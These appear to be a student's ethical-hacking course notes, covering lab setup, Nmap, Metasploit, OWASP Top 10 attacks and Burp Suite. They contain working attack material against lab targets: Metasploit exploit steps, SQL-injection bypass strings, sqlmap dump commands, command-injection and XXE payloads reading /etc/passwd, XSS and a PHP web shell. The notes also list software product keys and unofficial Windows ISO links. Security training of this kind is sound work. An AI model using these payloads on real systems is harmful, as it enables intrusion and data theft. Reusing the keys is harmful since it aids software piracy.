Scribd
Upload
40 views29 pages

Rinex3 Class Notes

Uploaded by

fejom93713
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
40 views29 pages

Rinex3 Class Notes

Uploaded by

fejom93713
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 29

811 3216 7637

117170
==============

Day 1 - Module 1 - 5/9/23


=========================

Introduction to Ethical Hacking


What is Hacking
Who is a Hacker?
Skills of a Hacker
Types of Hackers
Reasons for Hacking
--------------------------------

Week Point / Vulnerability

Types of Hacker:
White Hat Hacker = Ethical Hacking or Hacker
Black Hat Hacker = Unethical Hacker
Grey Hat Hacker = Both White & Black

Mr Robot

Skills
------

Kali Linux
Networking
Programing
Vulnerabilty
Vulnerabilty Testing
Vulnerabilty Exploit
Security
etc..

Hacking Lab Setup


-----------------

Task:

Download files ->

VMware = https://www.vmware.com/go/getworkstation-win

Kali Linux = https://cdimage.kali.org/kali-2023.2/kali-linux-2023.2-vmware-amd64.7z


7zip = https://www.7-zip.org/a/7z2301-x64.exe

Servers Metasploitable 2 =
https://sourceforge.net/projects/metasploitable/files/latest/download

Bee Box = https://download.vulnhub.com/bwapp/bee-box_v1.6.7z

Windows 7 =
https://drive.google.com/file/d/1RTNLLEOtm64CTEr4UmDn1E8vUHToBSjK/view?usp=shari
ng

https://soft.uclv.edu.cu/Microsoft/Microsoft.Windows.7/en_windows_7_professional_with_sp
1_vl_build_x64_dvd_u_677791.iso

Windows 10 = http://185.194.29.37/win10/Win10.21H1.iso

------------------------------------------------------------------------------------
06/09/23

Day 2 - Module 1 - 06/09/23


================

Hacking Lab Setup


-----------------

VMware = MC60H-DWHD5-H80U9-6V85M-8280D

Kali Linux

Windows 7 pro = AXBS6-LR9OV-MEYF5-RMJB9-UCRT2P

Windows 10 pro = W269N-WFGWX-YVC9B-4J6C9-T83GX

Linux server

Task: Setup Your hacking lab

---------------------------------------------------------------------------
07/09/23

Day 3 - Module 1 - 07/09/23


================
Who is at risk for Hacking Attacks?
Effects of computer hacking on an organization
Essential Terminology
Kali Linux fundamentals
----------------------------------------------

Attack
Vulnerability - Week Points, Loop Hole
Threat -
Risk -

Linux Based OS
--------------
Apple -> MAC, IOS
Google -> Android
Offsec -> Kali Linux

Whax -> Whoppix -> Backtrack -> Kali

Basics of Computer
Networking

Kali File System


FHS - Filesystem Heirarchy Standard

Root Directory / Folder = /


Home Directory = ~

OS Interface:
GUI -
CLI - Command Line Interface

User:
Root / Admin
Normal - raj, sneha, rocky

pwd = present working directory

Commands:

pwd
ls
cd Desktop
cd ..
cd /
cd
mkdir folder-name
rmdir folder-name
touch file-name
rm file-name

Task:
-----

How to copy file and folder in kali?


How to move file and folder in kali?
How to rename file and folder in kali?
How to edit a file?
How to read a file?
How to update kali?
How to upgrade kali?

---------------------------------------------------------------------
11/09/23

Day 4 - Module 1 - 11/9/23


==========================

Top Information Security Attack Vectors


Types of Attacks on a System
Advance Commands in kali linux
------------------------------

DOS & DDOS


Brute Force
Malware

Injection
Shell File upload
XSS
Brute Force
XML
etc..

Commands:
---------
cp file-name folder-name/
mv file-name folder-name/
mv file-name new-file-name
rm file-name
rm -rf folder-name
rmdir folder-name
nano file-name
sudo apt update
sudo apt upgrade
sudo apt install tool-name
passwd
sudo su
passwd kali
adduser username
su username
sudo cat /etc/shadow

Task: How to create a user group?


How to add users in a group?
File permissions

https://discord.gg/SvEvdSKagT

------------------------------------------------------------------------
12/9/23

Day 5 - Module 1 - 12/9/23


==========================

What is Ethical Hacking


Why Ethical Hacking is Necessary
Scope and Limitations of Ethical Hacking
Hacking Phases
-----------------------------------------

Hacking Phases:

Reconnaissance - Basic Info Gather


Scanning -
Gain Access -
Maintain Access -
cover Tracks -
Report Writing -

Reconnaissance:
Domain name, Subdomain, IP, Web Technologies, Email, phone, dns

OSINT (Open Source Intelligence)


--------------------------------

Target: microsoft

URL = https://www.microsoft.com/en-in
Domain = www.microsoft.com

Commands:

subfinder -d microsoft.com

theHarvester -d microsoft.com -b bing

nslookup microsoft.com

Wappalyzer browser extension for web technologies info

Email & Subdomin = https://phonebook.cz/

dnsrecon -d microsoft.com -t std

Task: Research about Maltego CE.

----------------------------------------------------------------
13/9/23

Day 6 - Module 2 - 13/9/23


===========================

Introduction to Network Security


Introduction to Networking
--------------------------------

Types of Network
LAN - Local Area Network
WAN (Internet) - Wide Area Network

ISP - Internet Service Provider


JIO, Airtel, BSNL, Vodafone, Broadban

Address
Physical = MAC (Media Access Control)
Virtual = IP (Internet Protocol)

Types of IP
Private IP = No Internet
Public IP = Internet

Ip Check
ipconfig -> windows
ifconfig -> Kali linux
Public ip check = https://whatismyipaddress.com/

Ports & Protocols


Physical = usb, hdmi, etc..
Virtual = 65535

21 - ftp (File Transfer Protocol)


80 - http
443 - https

IP Version
IPv4 = 192.168.1.1
4 Octet
0 min
255 max
0.0.0.0
255.255.255.255

4 billion

IPv6 = 2401:4900:1c2b:e4c3:441d:23d4:4ce6:8c67
8
128

78.58.98.01.54 - N | N
1.1.1.1.1 - N | N
0.0.0.0 - V | V
256.25.45.89 - V | N
255.255.255.255 - V | V
256.256.256 - N

0.0.0.0
0.0.0.1
0.0.0.2
0.0.0.255
0.0.1.0
0.0.1.1

Task: Study about Well Known Ports.

-----------------------------------------------------------------

Day 7 - Module 2 - 14/9/23


==========================
3 way handshake
TCP & UDP
Wireshark
-----------------

you (Hi) -> Packet (your ip, your dst ip, your port no, your dst port, your mac, your dst mac,
protocol, etc...) -> router ->

Wireshark
---------

Network Trafic Monitoring


Network Packet Analysis
Network Packet Capture

Ping -> icmp Protocol

TCP - Transmission Control Protocol


UDP - User Datagram Protocol

You ---> Google.com

SYN ->
SYN, ACK <-
ACK ->

Transfer data

UDP

Transfer data

Task: Practice Wireshark

-----------------------------------------------------------------

Day 8 - Module 2 - 18/9/23


==========================

Information Gathering
Scanning a Network
Nmap Tool
---------------

Nmap = Network Mapper


Open Ports and Protocol / Service Scanning
Service Version Scanning
OS Detection
Script Scanning

Commands:

nmap ip
nmap -p1-65535 ip
nmap -p80 ip
nmap -p80,21,54 ip

nmap domain.com

nmap -O ip
nmap -A ip

nmap -p21 --script=ftp-anon.nse ip

sudo nmap -p1-65535 -sV -O 192.168.1.88

Task: Scan metasploitable2 study about services.

https://discord.gg/SvEvdSKagT

-----------------------------------------------------------------

Day 9 - Module 2 - 19/9/23


==========================

Attacks using Metasploit framework


Eternalblue Exploit
Metasploitable2 vsftpd exploit
----------------------------------

Metasploit-Framework

Find Vulnerability -> Vulnerability Exploit ->

Scan
Find Vuln
Exploit
Create payload (malware/Virus)

RHOST = Remote Host (Target IP)


RPORT = Remote Port (Target Port)

LHOST = Attacker IP
LPORT = Attacker Port

Metasploit-Framework:
RHOST -> Target IP Address
RPORT -> Target Port No
LHOST -> Attacker IP Address
LPORT -> Attacker POrt No

Metasploitable 2 port no 21 vsftpd 2.3.4 backdoor exploit commands:


-------------------------------------------------------------------
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set rhost 192.168.1.28
show options
exploit

meterpreter> id
meterpreter> whoami
meterpreter> ls
meterpreter> pwd

Windows 7 sp 1 Exploit:
-----------------------
445 - SMBv1

Commans:

nmap --script=smb-vuln* 192.168.1.30

msfconosle
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhost 192.168.1.30
show options
exploit

meterpreter> sysinfo
meterpreter> shell
meterpreter> screenshare
meterpreter> help

Task: Exploit Windows 7 and Metasploitable 2


Create a report on it and submit

--------------------------------------------------------------

Day 10 - Module 3 - 20/9/23


===========================

Introduction to Web Application


-------------------------------

VAPT
Website -> WAPT
Network -> NPT

Website -> Web Technologies

HTML, PHP, JavaScript, CSS, etc..


Database -> MySQL, Postgresql etc..
Web Server -> Apache, Nginx, IIS etc..
Server (Computer) ->

.html = Hypertext Markup Language

Html tags

.php = Personal Home Page

Code:

<!DOCTYPE html>

<html>

<head>
<title>WAPT</title>
</head>

<body>
<h1>This is hed</h1>
<marquee>Mr. Hacker</marquee>
<p>This is para</p>

<?php
echo "This is PHP";
?>
</body>

</html>

Save this file as .php

Web Root =

Apache2 = /var/www/html/

service apache2 start


service apache2 stop

Task: Create a webpage and access the webpage through apache server in kali

----------------------------------------------------------------

Day 11 - Module 3 - 21/09/23


============================

HTTP Protocol
HTTP Request
HTTP Response
HTTP Methods
HTTP Status Codes
Client Server Communication
----------------------------

Browser (Client) --http request methods--> Server


Browser (Client) <--http Response codes-- Server

Request Method
GET Request -> https://www.google.com/
POST Request
etc..

Response codes
100 - 199 (Info)
200 - 299 (Success)
300 - 399 (Redirect)
400 - 499 (Client Error)
500 - 599 (Server Error)

Live Server Hosting

Hosting = Amazon, google, microsoft azure, linod, godaddy etc..


Free Hosting = 000webhost, wix, infinityfree, etc...
Free Domain

raj.com
raj.in
raj.gov

mrrobot.000.pe -> 72 hr

http
+ ssl certificate
https

Task: Create a webpage and send me your website address.

---------------------------------------------------------

Day 12 - Module 3 - 25/9/23


============================

HTTP Security (HTTPS)


Web servers
Application servers
Database servers
------------------------------

80 - http

http://testphp.vulnweb.com/

443 - https (Secure)

https://www.google.com/

Web Server = Static Content / Static Website

Application Server = Dynamic Content / Dynamix Website

Database Server = Store web content

XAMPP Software = https://www.apachefriends.org/download


Apache
MySql
Wordpress

Server = Computer

xampp apache web root directory = C:\xampp\htdocs

Xampp mysql database = http://localhost/phpmyadmin/

C:\xampp\htdocs\wordpress\wp-config-sample.php

/** The name of the database for WordPress */


define( 'DB_NAME', 'wordpress' );

/** Database username */


define( 'DB_USER', 'root' );

/** Database password */


define( 'DB_PASSWORD', '' );

Task: Create a wordpress website

------------------------------------------------------------

Day 13 - Module 4 - 26/09/23


============================

Open Web Application Security Project (OWASP)


Injection
HTML Injection
OS Command Injection
---------------------------------------------

OWASP TOP 10 = https://owasp.org/Top10/

OWASP = Open Web Application Security Project

Top 10 Vulnerability List

Injection
---------
Bypass Login pages
Database
Website Defacement
etc..
HTML Injection
OS Command Injection
SQL Injection
etc..

Web Site Input Fields


---------------------
Login Page
Feedback
Comments
Search
Name = <h1>Raj Singh</h1>
email = [email protected]
phone = 9755858555
etc..

HTML Injection
--------------
<h1>Type your text</h1>

OS Command Injection
--------------------
www.google.com;ls
www.google.com;pwd
www.google.com;cat /etc/passwd
www.google.com;hostname

www.google.com&&ls

Task: Practice html & os command injection

-----------------------------------------------------------

Day 14 - Module 4 - 27/9/23


===========================

Broken Authentication
SQL Injection
---------------------

SQL = Structured Query Language

website --------------sql---------------> database

Database Name = account


Table Name = users
id | name | phone | user | pass
------------------------------------------------
1 raj 98454 raj123 123456
2 abc 845848 abc123 45889

Username: raj123; Password: 123456 --------------->

raj123=raj123 True
12345=123456 False

SQL Injection Authentication Bypass

Username: admin'or'1'='1
Password: admin'or'1'='1

Username: raj123
Password: admin'or'1'='1

https://github.com/payloadbox/sql-injection-payload-list

Union Based SQL Injection


--------------------------

http://example.com/xyz.php?xyz=1
https://example.com/xyz.asp?xyz=1

http://testphp.vulnweb.com/listproducts.php?cat=1'
Image Missing
Data Missing
Error

Target URL = http://testphp.vulnweb.com/listproducts.php?cat=1

Tool: sqlmap

Commands:
---------

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -T users -D acuart

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dump -C


name,address,uname,pass -T users -D acuart
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dump -T users -D acuart

Task: Perform sql injeciton on testphp.vulnweb.com

------------------------------------------------------------------------------------

Day 15 - Module 4 - 03/10/23


============================

Sensitive Data Exposure


Directory Brute-Forcing
XML External Entities (XXE)
----------------------------

Tool: dirb (CLI) / dirbuster (GUI)

dirb http://testphp.vulnweb.com/

XML External Entities (XXE)


---------------------------

Burp Suite

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE root
[
<!ENTITY XXE SYSTEM
"file:///etc/passwd">
]>
<reset><login>&XXE;</login><secret>Any bugs?</secret></reset>

Task: Perform Directory Brute-Forcing on testphp.vulnweb.com testasp.vulnweb.com

---------------------------------------------------------------------------

Day 16 - Module 4 - 4/10/23


===========================

Broken Access Control


Security Misconfiguration
-------------------------
id | name | phone | user | pass | email | addr
-------------------------------------------------------------------------
1 raj 98454 raj123 123456 [email protected] Punjab
2 abc 845848 abc123 45889 [email protected] Delhi
3 Akshy 7985498 aks123 abc123 [email protected] Kolkata

IDOR (Insecure Direct Object References) Vulnerability / Attack


----------------------------------------------------------------

GET /rest/basket/6 HTTP/1.1 -> GET /rest/basket/4 HTTP/1.1

http://10.10.204.66/note.php?note=1 -> http://10.10.204.66/note.php?note=0

Security Misconfiguration
-------------------------

Weak Credentials

Username: admin
Password: admin

VPLE Download link = https://sourceforge.net/projects/vple/

Task: Perform Broken Access Control

--------------------------------------------------------------------------

Day 17 - Module 4 - 5/10/23


============================

XSS
---

Cross Site Scripting

Input Fields
Search Box
Name = Raj
Phone = 9798989
Email = [email protected]
Comments
Feedback
etc..

Malicious Code
JavaScript
HTML

<script>alert("Mr. Hacker")</script>

<script>document.body.innerHTML="<h1>Hacked by Raj</h1>"</script>

Type of XSS
Reflected
Stored

Task: Perform XSS Stored Attack on DVWA -> Result Hacked by Student Name

-----------------------------------------------------------------

Day 18 - Module 4 - 9/10/23


===========================

Insecure Deserialization
Using Components with Known Vulnerabilities
Insufficient Logging and Monitoring
--------------------------------------------

Insecure Deserialization

serialization

www ------> Database

pass123 --- 0001011110101101010 --> pass123 -> Database

pass123 --- Malicious Data --> RCE -> Server

Cookie Packet

Command:
--------
nc -lnvp 4444

https://assets.tryhackme.com/additional/cmn-owasptopten/pickleme.py

python3 pickleme.py

Using Components with Known Vulnerabilities


-------------------------------------------
Insufficient Logging and Monitoring
------------------------------------

Task: Practice Using Components with Known Vulnerabilities & Insufficient Logging and
Monitoring

---------------------------------------------------------------------------------------------------------------------------
----------------------------------------

Day 19 - Module 5 - 10/10/23


============================

Burp Suite
Introduction to Burp Suite
Lab Setup
Working of proxy in Burp Suite
(Buy product)
---------------------------------

Proxy IP : 127.0.0.1
Proxy Port : 8080

GET / HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Post Parameter Tempering

http://burp

{"balance":0,"cost":0}

Task: https://billionth-difficult.000webhostapp.com/buy_flag/#

---------------------------------------------------------------------
Day 20 - Module 5 - 11/10/23
============================

Working of Intruder in Burp suite


Different Attack Types(sniper, Battering Ram, Pitch Fork and cluster bomb)
Working of Repeater in Burp Suite
--------------------------------------------------------------

Intruder
--------

Sniper:
1 Wordlist
admin
password
root
test

Useraname | Password
---------------------
xyz pass123

admin pass123
password pass123
root pass123
test pass123

xyz admin
xyz password
xyz root
xyz test

Battering ram:
1 Wordlist
admin
password
root
test

Useraname | Password
---------------------
xyz pass123

admin admin
password password
root root
test test

Pitchfork:
2 Wordilst
User | Pass
-----------
admin pass
root toor
abc test
test def
xyz

Useraname | Password
---------------------
xyz pass123

admin pass
root toor
abc test
test def

Cluster bomb:
2 Wordlist
User | Pass
-----------
admin pass
root toor
abc test
test def
xyz

Useraname | Password
---------------------
xyz pass123

admin pass
admin toor
admin test
admin def
admin xyz
root pass

Repeater
--------
Task: Perform Brute force on testphp.vulnweb.com

--------------------------------------------------------------------

Day 21 - Module 5 - 12/10/23


============================

Decoder and Encoder


-------------------

Decoder
Comparer
Extensions

Account Bal : 100; Product : 50

Hash cracking = https://md5hashing.net


https://crackstation.net/

Task: Practice Decoder and Comparer.

https://drive.google.com/file/d/1_qosF4qbuO8iQUUdeOKlawgbiQvXBImK/view?usp=sharing

--------------------------------------------------------------------------------

Day 22 - Module 6 - 16/10/23


=============================

Vulnerability Analysis
Introduction to CVSS Scoring
CVSS Calculation
Risk Rating
Severity level analysis
Color coding
------------------------------

Vulnerability Number = CVE Details (CVE-2023-5322) = https://nvd.nist.gov/

Risk Rating => (0.0 - 10.0) CVSS (Common Vulnerability Scoring System) =
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

Severity level analysis = None, Info, Low, Medium, High, Critical


https://zerodium.com/program.html

CTF = https://overthewire.org/wargames/bandit/

Host = bandit.labs.overthewire.org
Port = 2220
Username = bandit0
Password = bandit0

ssh [email protected] -p 2220

Task: CTF = https://overthewire.org/wargames/bandit/

--------------------------------------------------------------------------------

Day 23 - Module 7 - 17/10/23


============================

Mitigations
SQL Injection Mitigations
Input Validation
Mitigations to HTML Injection
Mitigations to XSS
Mitigations to Directory Traversal | Demo
-----------------------------------------

Input Validation

Login Page Bypass


Username: admin' or '1'='1
Password: admin' or '1'='1

Bad Character = ''""()--=#^&*<>/

White List = a-z,0-9


Black List = ''""()--=#^&*

Input Field:
Name - a-z, max 15
Phone - 0-9, max 10
Email - @. a-z, 0-9, max 20
etc..

Directory Traversal
-------------------
Patch Traversal
Dot Dot Slash (../) Attack

Web Root Directory = /var/www/html/


index.html, .php, .css.
javascript, xyz-folder, etc..

http://192.168.1.31/bWAPP/directory_traversal_2.php?directory=documents

http://192.168.1.31/bWAPP/directory_traversal_2.php?directory=../../

http://192.168.1.31/bWAPP/directory_traversal_1.php?page=../../../etc/passwd

/etc/passwd

Task: Bypass High level security in bwapp.

---------------------------------------------------------------------------------

Day 24 - Module 7 - 18/10/23


============================

File Upload Vulnerability


-------------------------

Upload Vuln
File Upload Vuln
Shell File Upload Vuln

Upload Options:
CV Upload - .pdf, .doc | .html, .php, .js, .png, etc...
Photo Upload - .jpeg, .png | .pdf, .html, .php
Video Upload - .mp4, .mkv
etc..

Security:
Upload Validation
White List - .jpeg, .png

Magic Number

File Data / Format

WAF = Web Application firewall


Php Shell file code:

<?php
echo system($_GET["cmd"])
?>

Save as .php

b374k.php = https://github.com/The404Hacking/b374k-mini/blob/master/b374k.php

Task: Perform shell file upload on dvwa website.

---------------------------------------------------------------------------------

Day 25 - Module 7 - 19/10/23


============================

Mitigations to File Inclusion | Demo


Mitigation to security Misconfiguration
Mitigation to Sensitive Data Exposure
Mitigations to Host Header Injection
Mitigations to XML Injection
---------------------------------------

Mitigation of File Inclusion

Mitigation of Security Misconfiguraiton

Host Header Injection


---------------------

HTTP Request Header:

GET /hostheader_1.php HTTP/1.1


Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=kpdnauevgrbnci67b57qqmcla1; security_level=0
Upgrade-Insecure-Requests: 1

Host Header Modify:


Host: www.google.com
X-Forwarded-Host: www.google.com

Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
----------------------------------------------------------------
use exploit/multi/http/php_cgi_arg_injection
show options
set rhost 192.168.1.24
exploit

Task: Exploit php vulnerability on dvwa

---------------------------------------------------------------------------------

Day 26 - Module 8 - 20/10/23


============================

Report Writing
Detailed Reporting of Vulnerabilities with Risk Rating
Findings
Mitigations
Steps to Reproduce
Support Evidence
-------------------

Acunetix, Nessus, Burp-Pro ($)

OWASP Zap (Free)

sudo apt update


sudo apt install zaproxy -y

Task: http://vulnweb.com/ -> Submit vulnerability Scanning report.

-------------------------------------------------------------------

Day 27 - Module 9 - 23/10/23


============================

Interview Preparation and Wrap up


----------------------------------
CV

Pentester
SOC
Cloud Security
IoT Security
Malware Ana

Keywords
Cloud Security 20%
Network Vapt 80%
Linux 100%

CEH Certificate
Comptia Security+

OSCP Certificate

48 hr

24 hr -> 6-7 hack


24 hr -> Report

--------------------------------------------------------------------------

Day 28 - Doubt Class - 25/10/23


===============================

SOC

Pentester

Malware

Cloud Security

Tor Project

Public IP --------- airtel ----- vpn -- tor ----> Google.com

.com, .in, gov etc...

.onion

https://www.torproject.org/download/

You might also like